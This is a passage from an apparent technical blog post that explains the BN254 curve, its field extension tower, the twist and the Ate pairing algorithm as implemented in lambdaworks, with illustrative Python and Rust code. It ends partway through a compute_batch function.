&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * $p = 36x^4 + 36x^3 + 24x^2 + 6x + 1$ is the 254-bit prime number:&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;p = 21888242871839275222246405745257275088696311157297823662689037894645226208583&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;x = 4965661367192848881&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * $t = 6x^2 + 1$ is the trace of Frobenius.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * $r = 36x^4 + 36x^3 + 18x^2 + 6x + 1 = p + 1 - t$ is the number of points on the curve $E(\mathbb{F_p })$.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;&lt;h2 id=&quot;point-coordinates&quot;&gt;Point Coordinates&lt;&#x2F;h2&gt;
&lt;p&gt;Since we define the elliptic curve as the set of points that satisfy the equation written above, it is natural to think of an element $P \in E(\mathbb{F_p })$ using two coordinates $P = (x, y)$. This representation is called &lt;em&gt;Affine Representation&lt;&#x2F;em&gt; and its coordinates are known as &lt;em&gt;Affine Coordinates&lt;&#x2F;em&gt;. However, to optimize the arithmetic it is often convenient to use what is known as &lt;em&gt;Projective Coordinates&lt;&#x2F;em&gt;, which represents points with three coordinates $x,$ $y,$ $z$ and is constructed in the following way:&lt;br &#x2F;&gt;
If $P = (x, y)$ is a point in affine coordinates, then $(x, y, 1)$ is its projective representation. And if $P = (x, y, z)$ is a point in projective coordinates, then $(\frac{x}{z}, \frac{y}{z})$ is its affine representation. You’ll see in our implementation that we use both representations depending on what we need in each case, using functions like &lt;code&gt;to_affine()&lt;&#x2F;code&gt;.&lt;&#x2F;p&gt;
&lt;p&gt;There is a third representation that we won’t use, but that you may find in some papers, called &lt;em&gt;Jacobian Coordinates&lt;&#x2F;em&gt;: If $P = (x, y, z)$ is a point in Jacobian coordinates, then $(\frac{x}{z}, \frac{y}{z^2 }, z)$ and $(\frac{x}{z^2 }, \frac{y}{z^3 })$ are its projective and affine coordinates respectively.&lt;&#x2F;p&gt;
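&lt;p&gt;As a minimal sketch (our own toy code, not the lambdaworks API), the affine and projective representations described above can be written with plain modular arithmetic. The names and the sample point $(1, 2)$, which satisfies $y^2 = x^3 + 3$, are illustrative choices:&lt;&#x2F;p&gt;

```python
# Illustrative sketch only (not the lambdaworks API): affine and projective
# coordinates for BN254 over F_p, as described above.
p = 21888242871839275222246405745257275088696311157297823662689037894645226208583

def to_projective(x, y):
    # Affine (x, y) -> projective (x, y, 1).
    return (x, y, 1)

def to_affine(x, y, z):
    # Projective (x, y, z) -> affine (x/z, y/z), using the modular inverse of z.
    z_inv = pow(z, -1, p)
    return (x * z_inv % p, y * z_inv % p)

# (1, 2) satisfies y^2 = x^3 + 3. Scaling all three projective coordinates
# by the same nonzero z represents the same point.
z = 5
scaled = (1 * z % p, 2 * z % p, z)
assert to_affine(*scaled) == (1, 2)
```

&lt;p&gt;Any nonzero scalar multiple of a projective triple represents the same point, which is what lets curve formulas postpone costly field inversions until a final &lt;code&gt;to_affine()&lt;&#x2F;code&gt; call.&lt;&#x2F;p&gt;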
&lt;h2 id=&quot;field-extension-tower&quot;&gt;Field Extension Tower&lt;&#x2F;h2&gt;
&lt;p&gt;A pairing is a map $e: \mathbb{G_1 } \times \mathbb{G_2 } \to \mathbb{G_t }$, and this means that it takes as input two points, each from a group with the same number of points (or order) $r$. This number $r$ must be prime, and to guarantee security, it must be large. Also, for rather technical reasons, these two groups need to be distinct. So, to define a pairing, we need to choose the domain and codomain groups. The group $\mathbb{G_1 }$ will be the curve $E(\mathbb{F_p })$, but to define $\mathbb{G_2 }$ and $\mathbb{G_t }$ we’ll need to &lt;em&gt;extend&lt;&#x2F;em&gt; the field $\mathbb{F_p }$. We are not going to explain in detail what field extensions are and how they are built, so if you are looking for a better understanding, we recommend reading the section &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;hackmd.io&#x2F;@benjaminion&#x2F;bls12-381#Field-extensions&quot;&gt;Field Extensions&lt;&#x2F;a&gt; from &lt;em&gt;BLS12-381 For the Rest of US&lt;&#x2F;em&gt;. Here, we’ll summarize the basic concepts necessary to understand our implementation and the algorithms we use.&lt;&#x2F;p&gt;
&lt;p&gt;Roughly speaking, our goal is to extend the field $\mathbb{F_p }$ to $\mathbb{F_{ p^{12} }}$, and we will do it in the following way. First, we extend $\mathbb{F_p }$ to $\mathbb{F_{ p^2 }}$ in the same way that the field of real numbers $\mathbb{R}$ is extended to the field of complex numbers $\mathbb{C}$: We define $$\mathbb{F_{ p^2 }} = \mathbb{F_p } [u] &#x2F; (u^2 + 1).$$ That’s a lot of symbols to process. The good news is that all we need to understand is that $\mathbb{F_{ p^2 }}$ is a finite field whose elements are polynomials of degree 1 in the variable $u$; that is, they have the form $$a + bu \quad \text{ with } a, b \in \mathbb{F_p }.$$ If we think of them as complex numbers, $a$ would be the real part and $b$ the imaginary one. Note that $\mathbb{F_p } \subseteq \mathbb{F_{ p^2 }}$ because we can think of the elements of the left one as elements of the right one with “imaginary part” zero or $b = 0$. So, $\mathbb{F_{ p^2 } }$ is indeed an extension of $\mathbb{F_p }.$&lt;br &#x2F;&gt;
Secondly, we extend $\mathbb{F_{ p^2 }}$ in a similar way defining $$\mathbb{F_{ p^6 }} = \mathbb{F_{ p^2 }} [v] &#x2F; (v^3 - (9 + u)).$$ In this case, since $v^3 - (9 + u)$ is a polynomial of degree 3, the elements of $\mathbb{F_{ p^6 }}$ will be polynomials of degree 2 and variable $v$ of the form $$a + bv + cv^2 \quad \text{ with } a, b, c \in \mathbb{F_{ p^2 }}.$$ Finally, we extend $\mathbb{F_{ p^6 }}$ defining $$\mathbb{F_{ p^{12} }} = \mathbb{F_{ p^6 }} [w] &#x2F; (w^2 - v),$$ that is, its elements are again polynomials of degree 1 with variable $w$ of the form $$a + bw \quad \text{ with } a, b \in \mathbb{F_{ p^6 } }.$$&lt;br &#x2F;&gt;
Now, in practice, using lambdaworks, we have two different ways to define an element $f = a + bw \in \mathbb{F_{ p^{12} }}$. We can use &lt;code&gt;new()&lt;&#x2F;code&gt;,&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;let f = Fp12E::new([a, b])&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;or we can use &lt;code&gt;from_coefficients()&lt;&#x2F;code&gt;.&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;let f = Fp12E::from_coefficients([&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&amp;quot;a_00&amp;quot;, &amp;quot;a_01&amp;quot;, &amp;quot;a_10&amp;quot;, &amp;quot;a_11&amp;quot;, &amp;quot;a_20&amp;quot;, &amp;quot;a_21&amp;quot;, &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&amp;quot;b_00&amp;quot;, &amp;quot;b_01&amp;quot;, &amp;quot;b_10&amp;quot;, &amp;quot;b_11&amp;quot;, &amp;quot;b_20&amp;quot;, &amp;quot;b_21&amp;quot;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;])&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;In the last case we use 12 coefficients to define $f$ because $f = a + bw$, where $a, b \in \mathbb{F_{ p^6 }}$. Then, $$a = \style{color: magenta} {a_0} + \style{color: magenta} {a_1}v + \style{color: magenta}{a_2}v^2 \quad \text{and} \quad b = \style{color: orange}{b_0} + \style{color: orange}{b_1}v + \style{color: orange}{b_2}v^2,&lt;br &#x2F;&gt;
$$ with $a_i, b_i \in \mathbb{F_{ p^2 }}$. And therefore, $$\style{color: magenta}{a_i} = a_{i0} + a_{i1} u \quad \text{and} \quad \style{color: orange}{b_i} = b_{i0} + b_{i1} u,$$ thus reaching the 12 coefficients.&lt;&#x2F;p&gt;
&lt;p&gt;There is another representation of the elements of $\mathbb{F_{ p^{12} }}$ that you could find in papers and algorithms that we used in our implementation. Since $v^3 = 9 + u$ and $w^2 = v$, we have that $w^6 = 9 + u$ and then, $$\mathbb{F_{ p^{12} }} = \mathbb{F_{ p^2 }} [w] &#x2F; (w^6 - (9 + u)).$$ Again, you don’t have to understand the previous sentence; the important thing is that we can not only represent $f$ as a polynomial of degree 1 and as a polynomial of degree 11 but also as a polynomial of degree 5 using $a_i$ and $b_i$ in the following way:&lt;br &#x2F;&gt;
$$ f = \style{color: magenta}{a_0} + \style{color: orange}{b_0} w + \style{color: magenta}{a_1} w^2 + \style{color: orange}{b_1} w^3 + \style{color: magenta}{a_2} w^4 + \style{color: orange}{b_2} w^5.$$ So every time you see an element of $\mathbb{F_{ p^{12} }}$ represented as a polynomial of degree 5, you will know how to write it as $a + bw$, constructing $a = \style{color: magenta}{a_0} + \style{color: magenta}{a_1}v + \style{color: magenta}{a_2}v^2$ and $b = \style{color: orange}{b_0} + \style{color: orange}{b_1}v + \style{color: orange}{b_2}v^2$ using its coefficients (and vice versa). Having different representations of the same extension field will allow us to apply some optimizations when implementing the pairing (see the section &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;hackmd.io&#x2F;@Wimet&#x2F;ry7z1Xj-2#Tower-of-Extension-Fields&quot;&gt;Tower of Extension Fields&lt;&#x2F;a&gt; of &lt;em&gt;Computing the Optimal Ate Pairing Over the BN254 Curve&lt;&#x2F;em&gt;).&lt;&#x2F;p&gt;
&lt;p&gt;This may be a lot of new information, but don’t worry; you don’t need to understand it in detail. When reading the implementation, the idea is to have these equalities at hand to recognize where each variable belongs and how many coefficients it has. In lambdaworks &lt;code&gt;bn_254&lt;&#x2F;code&gt; you’ll find these fields $\mathbb{F_p} ,$ $\mathbb{F_{ p^2 }},$ $\mathbb{F_{ p^6 }}$ and $\mathbb{F_{ p^{12} }}$ (with their operations implemented) as &lt;code&gt;BN254PrimeField&lt;&#x2F;code&gt;, &lt;code&gt;Degree2ExtensionField&lt;&#x2F;code&gt;, &lt;code&gt;Degree6ExtensionField&lt;&#x2F;code&gt; and &lt;code&gt;Degree12ExtensionField&lt;&#x2F;code&gt;.&lt;&#x2F;p&gt;
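&lt;p&gt;To make the first step of the tower concrete, here is a small sketch (our own toy code, not the library backend) of arithmetic in $\mathbb{F_{ p^2 }} = \mathbb{F_p } [u] &#x2F; (u^2 + 1)$, where elements are pairs $(a, b)$ standing for $a + bu$:&lt;&#x2F;p&gt;

```python
# Toy model of F_{p^2} = F_p[u]/(u^2 + 1): pairs (a, b) standing for a + b*u,
# multiplied exactly like complex numbers, but with coefficients mod p.
p = 21888242871839275222246405745257275088696311157297823662689037894645226208583

def fp2_add(x, y):
    return ((x[0] + y[0]) % p, (x[1] + y[1]) % p)

def fp2_mul(x, y):
    # (a + bu)(c + du) = (ac - bd) + (ad + bc)u, using u^2 = -1.
    a, b = x
    c, d = y
    return ((a * c - b * d) % p, (a * d + b * c) % p)

# u behaves like the imaginary unit: u * u = -1 in F_{p^2}.
u = (0, 1)
assert fp2_mul(u, u) == (p - 1, 0)
```

&lt;p&gt;The higher floors of the tower repeat this recipe: $\mathbb{F_{ p^6 }}$ uses triples over $\mathbb{F_{ p^2 }}$ reduced by $v^3 = 9 + u$, and $\mathbb{F_{ p^{12} }}$ uses pairs over $\mathbb{F_{ p^6 }}$ reduced by $w^2 = v$.&lt;&#x2F;p&gt;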
&lt;h2 id=&quot;twist&quot;&gt;Twist&lt;&#x2F;h2&gt;
&lt;p&gt;Since doing arithmetic in $\mathbb{F_{ p^{12} }}$ is complicated and inefficient, we will use a &lt;em&gt;twist&lt;&#x2F;em&gt;, which is like a coordinate conversion that transforms our curve $E(\mathbb{F_{ p^{12} }})$ into the following curve $E’$ defined over $\mathbb{F_{ p^2 }}$:&lt;br &#x2F;&gt;
$$y^2 = x^3 + \frac{3}{9 + u} .$$&lt;br &#x2F;&gt;
We will call this constant $b = \frac{3}{9 + u}$, implemented as &lt;code&gt;BN254TwistCurve::b()&lt;&#x2F;code&gt;.&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;b = 19485874751759354771024239261021720505790618469301721065564631296452457478373 &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    + 266929791119991161246907387137283842545076965332900288569378510910307636690 &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * u&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;So, in summary, we will use the following subgroups as inputs for the pairing:&lt;br &#x2F;&gt;
$$\mathbb{G_1} = E (\mathbb{F_p} ),$$&lt;br &#x2F;&gt;
$$\mathbb{G_2} \subseteq E^\prime ( \mathbb{F_{ p^2 }}) .$$&lt;br &#x2F;&gt;
And the output:&lt;br &#x2F;&gt;
$$\mathbb{G_t} \subseteq \mathbb{F_{ p^{12} } }^{\star} ,$$ where $\mathbb{F_{ p^{12} } }^{\star} = \mathbb{F_{ p^{12} } } - {0}$ (the multiplicative group of the field).&lt;&#x2F;p&gt;
&lt;p&gt;Knowing precisely which subgroups $\mathbb{G_2 }$ and $\mathbb{G_t }$ we should take is not relevant to understanding our implementation. For those who have the mathematical background or are interested in going deeper into those topics, we will just say that $\mathbb{G_1 }$ and $\mathbb{G_2 }$ are the $r$-&lt;em&gt;torsion groups&lt;&#x2F;em&gt; (i.e., the sets of points whose order divides $r$), while $\mathbb{G_t }$ is the set of the $r$-&lt;em&gt;th roots of unity&lt;&#x2F;em&gt;.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;the-pairing&quot;&gt;The Pairing&lt;&#x2F;h2&gt;
&lt;h3 id=&quot;what-is-a-pairing&quot;&gt;What is a pairing?&lt;&#x2F;h3&gt;
&lt;p&gt;Let’s better understand it now that we have defined everything necessary to build our pairing. A pairing is a bilinear map $e: \mathbb{G_1 } \times \mathbb{G_2 } \to \mathbb{G_t }$. &lt;em&gt;Bilinear&lt;&#x2F;em&gt; means that it has the following property: For all points $P_1, P_2 \in \mathbb{G_1 }$ and $Q_1, Q_2 \in \mathbb{G_2 }$,&lt;br &#x2F;&gt;
$$\begin{align} e(P_1, Q_1 + Q_2) &amp;amp;= e(P_1, Q_1) \cdot e(P_1, Q_2) \newline&lt;br &#x2F;&gt;
e(P_1 + P_2, Q_1) &amp;amp;= e(P_1, Q_1) \cdot e(P_2, Q_1)\end{align}$$ From this property, the following one can be deduced: For all $n, m \in \mathbb{N}$,&lt;br &#x2F;&gt;
$$e(nP, mQ) = e(P, mQ)^n = e(nP, Q)^m = e(P, Q)^{nm}.$$ Recall that in general, the additive notation $+$ is used to denote the operation of the groups $\mathbb{G_1 }$ and $\mathbb{G_2 }$, and multiplicative notation $\cdot$ is used to denote the operation of $\mathbb{G_t }$.&lt;&#x2F;p&gt;
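&lt;p&gt;To see the bilinearity law in action without any elliptic-curve machinery, here is a toy (and completely insecure) stand-in of our own: take $\mathbb{G_1 } = \mathbb{G_2 } = (\mathbb{Z_r }, +)$ and $\mathbb{G_t }$ the order-$r$ subgroup of $\mathbb{F_q }^{\star}$, with $e(a, b) = g^{ab}$. The small numbers below are arbitrary choices for illustration:&lt;&#x2F;p&gt;

```python
# A toy bilinear map (NOT a secure pairing, and not BN254): it only
# illustrates the bilinearity law stated above.
q = 1223                       # small prime
r = 47                         # prime divisor of q - 1 = 1222 = 2 * 13 * 47
g = pow(3, (q - 1) // r, q)    # generator of the order-r subgroup of F_q^*

def e(a, b):
    # "Pairing" of a in G1 and b in G2: exponents simply multiply mod r.
    return pow(g, (a * b) % r, q)

P1, Q1, Q2 = 5, 11, 20
# e(P1, Q1 + Q2) = e(P1, Q1) * e(P1, Q2)
assert e(P1, Q1 + Q2) == e(P1, Q1) * e(P1, Q2) % q
# e(n*P, m*Q) = e(P, Q)^(n*m)
n, m = 6, 7
assert e(n * P1, m * Q1) == pow(e(P1, Q1), n * m, q)
```

&lt;p&gt;A real pairing satisfies the same law on elliptic-curve groups, where evaluating the map requires the Miller loop described next rather than a single exponentiation.&lt;&#x2F;p&gt;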
&lt;h3 id=&quot;ate-pairing-algorithm&quot;&gt;Ate Pairing Algorithm&lt;&#x2F;h3&gt;
&lt;p&gt;We will use the algorithm of the Ate pairing from &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;eprint.iacr.org&#x2F;2010&#x2F;354.pdf&quot;&gt;this paper&lt;&#x2F;a&gt; (Page 4, Algorithm 1):&lt;&#x2F;p&gt;
&lt;hr &#x2F;&gt;
&lt;p&gt;&lt;strong&gt;Inputs&lt;&#x2F;strong&gt; : $P \in \mathbb{G}_1$ and $Q \in \mathbb{G}_2$&lt;br &#x2F;&gt;
&lt;strong&gt;Output:&lt;&#x2F;strong&gt; $f \in \mathbb{G}_t$&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1. define $T \in \mathbb{G}_2$;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    2. $T \leftarrow Q$;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    3. define $f \in \mathbb{G}_t$;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    4. $f \leftarrow 1$;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    5. for $i =$ `miller_length` $- 2$ to 0 do&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    6.      $f \leftarrow f^2$;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    7.      $T \leftarrow 2T$;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    8.      if `MILLER_CONSTANT`$[i] = -1$ then&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    9.          $f \leftarrow f \cdot l_{T, -Q}(P)$;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    10.          $T \leftarrow T - Q$;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    11.      else if `MILLER_CONSTANT`$[i] = 1$ then&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    12.          $f \leftarrow f \cdot l_{T, Q}(P)$;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    13.          $T \leftarrow T + Q$;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    14.      end if&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    15. end for&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    16. $Q_1 \leftarrow \varphi(Q)$;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    17. $f \leftarrow f \cdot l_{T, Q_1 }(P)$;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    18. $T \leftarrow T + Q_1$;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    19. $Q_2 \leftarrow \varphi(Q_1)$;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    20. $f \leftarrow f \cdot l_{T, - Q_2}(P)$;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    21. $f \leftarrow f^{ \frac{ p^{12} - 1 }{r}}$;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    22. return f;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;hr &#x2F;&gt;
&lt;p&gt;where:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * The number `MILLER_CONSTANT` $= 6x + 2$ with $x$ as the curve parameter we mentioned before. However, we need a particular representation of this number using powers of 2 and the coefficients $\\{- 1, 0, 1 \\}$. This representation is similar to a [NAF representation](https:&#x2F;&#x2F;en.wikipedia.org&#x2F;wiki&#x2F;Non-adjacent_form#:~:text=The%20non%2Dadjacent%20form%20\(NAF,8%20%E2%88%92%202%20%2B%201%20%3D%207\)), although it isn&amp;#39;t a NAF because it has adjacent non-zero values.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;          &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;          &#x2F;&#x2F; MILLER_CONSTANT = 6x + 2 = 29793968203157093288 =&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;          &#x2F;&#x2F; 2^3 + 2^5 - 2^7 + 2^10 - 2^11 + 2^14 + 2^17 + 2^18 - 2^20 + 2^23 &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;          &#x2F;&#x2F; - 2^25 + 2^30 + 2^31 + 2^32 - 2^35 + 2^38 - 2^44 + 2^47 + 2^48 &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;          &#x2F;&#x2F; - 2^51 + 2^55 + 2^56 - 2^58 + 2^61 + 2^63 + 2^64&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;          pub const MILLER_CONSTANT: [i32; 65] = [&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;              0, 0, 0, 1, 0, 1, 0, -1, 0, 0, 1, -1, 0, 0, 1, 0, 0, 1, 1, 0, -1, 0, 0, &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;              1, 0, -1, 0, 0, 0, 0, 1, 1, 1, 0, 0, -1, 0, 0, 1, 0, 0, 0, 0, 0, -1, 0, &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;              0, 1, 1, 0, 0, -1, 0, 0, 0, 1, 1, 0, -1, 0, 0, 1, 0, 1, 1&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;          ];&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;          &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;          &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;          let miller_length = MILLER_CONSTANT.len();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;          &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * The function $l_{T, Q}(P)$ is the line that passes through $T$ and $Q$ evaluated in $P$. We&amp;#39;ll see how to compute it later.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * The Frobenius morphism $\varphi: E&amp;#39;(\mathbb{F_{ p^2 } }) \to E&amp;#39;(\mathbb{F_{ p^2 }})$ is defined as $\varphi(x, y) = (x^p, y^p)$. We&amp;#39;ll also see it later.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;&lt;h3 id=&quot;batch&quot;&gt;Batch&lt;&#x2F;h3&gt;
&lt;p&gt;We will divide the algorithm presented into Miller Loop and Final Exponentiation to implement it. The &lt;code&gt;miller()&lt;&#x2F;code&gt; function does all the work from lines 1 to 20 of the algorithm, while &lt;code&gt;final_exponentiation()&lt;&#x2F;code&gt; computes only the last line 21 (which is a computation that requires some work). However, if we have different pairs of points $(P, Q)$ and we want to calculate each of their pairings to multiply all the results together (and see, for example, if it equals $1$), the most efficient way to do it is first to execute the Miller Loop for each pair of points, multiply the results and then apply the Final Exponentiation to the final result. The function that does this procedure is called &lt;code&gt;compute_batch()&lt;&#x2F;code&gt;.&lt;&#x2F;p&gt;
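&lt;p&gt;The reason batching is sound is that the Final Exponentiation is just a power map, and power maps distribute over products, so exponentiating once at the end agrees with exponentiating each Miller output separately. A miniature sketch with stand-in numbers (not the real BN254 parameters):&lt;&#x2F;p&gt;

```python
# Miniature illustration of why batching works: z -> z^e distributes over
# products in a multiplicative group. Small stand-in values, not BN254's.
q = 101                      # stand-in for the extension-field modulus
e = 20                       # stand-in for the exponent (p^12 - 1)/r

def final_exponentiation(z):
    return pow(z, e, q)

m1, m2 = 34, 57              # stand-ins for two Miller loop outputs
# Exponentiating the product equals the product of the exponentiations.
assert final_exponentiation(m1 * m2 % q) == \
       final_exponentiation(m1) * final_exponentiation(m2) % q
```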
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;fn compute_batch(&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    pairs: &amp;amp;[(&amp;amp;Self::G1Point, &amp;amp;Self::G2Point)],&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;) -&amp;gt; Result&amp;lt;FieldElement&amp;lt;Self::OutputField&amp;gt;, PairingError&amp;gt; {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let mut result = Fp12E::one();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    for (p, q) in pairs {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        &#x2F;&#x2F; do some checks before computing the Miller loop&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        &#x2F;&#x2F; ...&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
